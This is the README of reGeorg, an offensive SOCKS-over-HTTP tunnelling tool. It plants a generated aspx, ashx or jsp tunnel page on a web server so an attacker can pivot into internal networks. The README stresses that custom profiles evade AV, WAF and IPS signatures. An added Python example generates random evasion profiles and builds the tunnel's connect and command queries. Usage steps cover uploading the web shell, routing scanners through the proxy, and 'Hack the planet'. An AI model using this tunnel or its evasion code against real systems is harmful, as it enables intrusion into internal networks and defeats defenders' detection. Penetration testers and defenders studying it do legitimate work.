reGeorg
... every office needs a tool like Georg
willem.mouton@gmail.com / @_w_m__
1.1
reGeorg requires Python 3.x and the following modules:
- urllib3 - HTTP library with thread-safe connection pooling, file post, and more.
$ usage:
$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] [-u] [-v] [-f] [-g]
Socks server for reGeorg HTTP(s) tunneller
options:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
-f , --profile Profile file containing the tunnel keywords (see Step 1); create one, else you are going to be in AV hell
-g , --generate Template to generate shell from
- Step 1. Generate a tunnel (This is new)
First modify the values in reGeorgSocksProxy.py
profile = {
"SESSIONVAR_NAME": "simons-session",
"CMD_CONNECT": "plus",
"CMD_DISCONNECT": "like",
"CMD_FORWARD": "review",
"CMD_READ": "link",
"CMD_GET_PARAM": "option",
"CMD_GET_TARGET": "source",
"CMD_GET_PORT": "id",
"RESP_HEADER_CODE": "X-RC",
"RESP_HEADER_MESSAGE": "X-MSG",
"RESP_CODE_OK": "AYE",
"RESP_CODE_FAIL": "OEFT",
"BASICCHECKSTRING": "Good Morning Simon!"
}
This changes the network signature of the traffic and the file signature of the tunnel file, which helps you avoid AV/WAF/IPS rules written for the defaults.
Generate a new tunnel (aspx|ashx|jsp) (php is coming, still being tested):
python3 reGeorgSocksProxy.py -g templates/tunnel.aspx
This will create gen_tunnel.(aspx|ashx|jsp)
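Every value in the profile above is one of four things: a query-parameter name (CMD_GET_*), a command keyword sent in that parameter (CMD_CONNECT, CMD_DISCONNECT, CMD_FORWARD, CMD_READ), a response header name or status value (RESP_*), or the string the tunnel page answers with on a bare GET (BASICCHECKSTRING). The Python below is an added example, not reGeorg's own code: it maps those keys onto the HTTP exchange between reGeorgSocksProxy.py and the tunnel page, and derives a fresh random profile so none of the defaults ever hit the wire. The query-string layout, the case-insensitive header handling, the bare-GET check and the JSON profile file format are assumptions inferred from the key names, not taken from the tool; the README's own profile is used as the sample input.

```python
import json
import secrets
import string
from urllib.parse import urlencode

# Profile exactly as listed in the README (sample input).
README_PROFILE = {
    "SESSIONVAR_NAME": "simons-session",
    "CMD_CONNECT": "plus",
    "CMD_DISCONNECT": "like",
    "CMD_FORWARD": "review",
    "CMD_READ": "link",
    "CMD_GET_PARAM": "option",
    "CMD_GET_TARGET": "source",
    "CMD_GET_PORT": "id",
    "RESP_HEADER_CODE": "X-RC",
    "RESP_HEADER_MESSAGE": "X-MSG",
    "RESP_CODE_OK": "AYE",
    "RESP_CODE_FAIL": "OEFT",
    "BASICCHECKSTRING": "Good Morning Simon!",
}

# Command keywords: values carried in the CMD_GET_PARAM query parameter.
COMMAND_KEYS = ("CMD_CONNECT", "CMD_DISCONNECT", "CMD_FORWARD", "CMD_READ")
# Parameter names: the query-string keys the tunnel page reads (assumption).
PARAM_KEYS = ("CMD_GET_PARAM", "CMD_GET_TARGET", "CMD_GET_PORT")


def random_token(length=8):
    """Lowercase letters only: safe as a query key, header name and template identifier."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))


def _distinct_tokens(count, length=8):
    """Random tokens that are pairwise distinct, so the tunnel cannot confuse two keywords."""
    tokens = []
    while len(tokens) < count:
        t = random_token(length)
        if t not in tokens:
            tokens.append(t)
    return tokens


def random_profile():
    """Return a profile with every value replaced by a fresh random one."""
    profile = dict(zip(COMMAND_KEYS, _distinct_tokens(len(COMMAND_KEYS))))
    profile.update(zip(PARAM_KEYS, _distinct_tokens(len(PARAM_KEYS))))
    profile["SESSIONVAR_NAME"] = random_token()
    profile["RESP_HEADER_CODE"] = "X-" + random_token(4).upper()
    profile["RESP_HEADER_MESSAGE"] = "X-" + random_token(4).upper()
    profile["RESP_CODE_OK"], profile["RESP_CODE_FAIL"] = _distinct_tokens(2)
    profile["BASICCHECKSTRING"] = "Hello " + random_token() + "!"
    return profile


def connect_query(profile, target, port):
    """Query string that opens a tunnel to target:port.
    Assumption: CMD_GET_* are parameter names and CMD_CONNECT is the command value."""
    return urlencode({
        profile["CMD_GET_PARAM"]: profile["CMD_CONNECT"],
        profile["CMD_GET_TARGET"]: target,
        profile["CMD_GET_PORT"]: str(port),
    })


def command_query(profile, command_key):
    """Query string for commands that need no target (read, forward, disconnect)."""
    if command_key not in COMMAND_KEYS:
        raise ValueError(f"unknown command key {command_key!r}")
    return urlencode({profile["CMD_GET_PARAM"]: profile[command_key]})


def parse_response(profile, headers):
    """Interpret the tunnel page's response headers as (ok, message).
    Lookup is case-insensitive because HTTP header names are."""
    lowered = {k.lower(): v for k, v in headers.items()}
    code = lowered.get(profile["RESP_HEADER_CODE"].lower())
    message = lowered.get(profile["RESP_HEADER_MESSAGE"].lower(), "")
    if code == profile["RESP_CODE_OK"]:
        return True, message
    if code == profile["RESP_CODE_FAIL"]:
        return False, message or "tunnel reported failure"
    # No status header at all: WAF block page, 404, or the proxy and tunnel use different profiles.
    return False, "unexpected or missing status header"


def tunnel_alive(profile, body):
    """True if a bare GET of the tunnel page returned the expected check string (assumption)."""
    return body.strip() == profile["BASICCHECKSTRING"]


def profile_to_json(profile):
    """Serialise for -f/--profile (assumption: the profile file is JSON with these keys)."""
    return json.dumps(profile, indent=2)


if __name__ == "__main__":
    print("connect:", connect_query(README_PROFILE, "10.0.0.5", 22))
    print("read:   ", command_query(README_PROFILE, "CMD_READ"))
    print(parse_response(README_PROFILE, {"X-RC": "OEFT", "X-MSG": "Failed connecting"}))
    print(profile_to_json(random_profile()))
```

Run it once, keep the generated JSON next to the proxy, and regenerate the tunnel file from it; the point of the randomisation is that the query keys, command words and status headers are unique to one engagement, so a signature written for another deployment (or for the README defaults) does not match.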
- Step 2. Upload gen_tunnel.(aspx|ashx|jsp|php) to a webserver (how you do that is up to you)
- Step 3. Configure your tools to use a SOCKS proxy, using the IP address and port you specified when you started reGeorgSocksProxy.py
** Note: if your tools, such as Nmap, don't support SOCKS proxies, use proxychains (see wiki)
- Step 4. Hack the planet :)
$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
MIT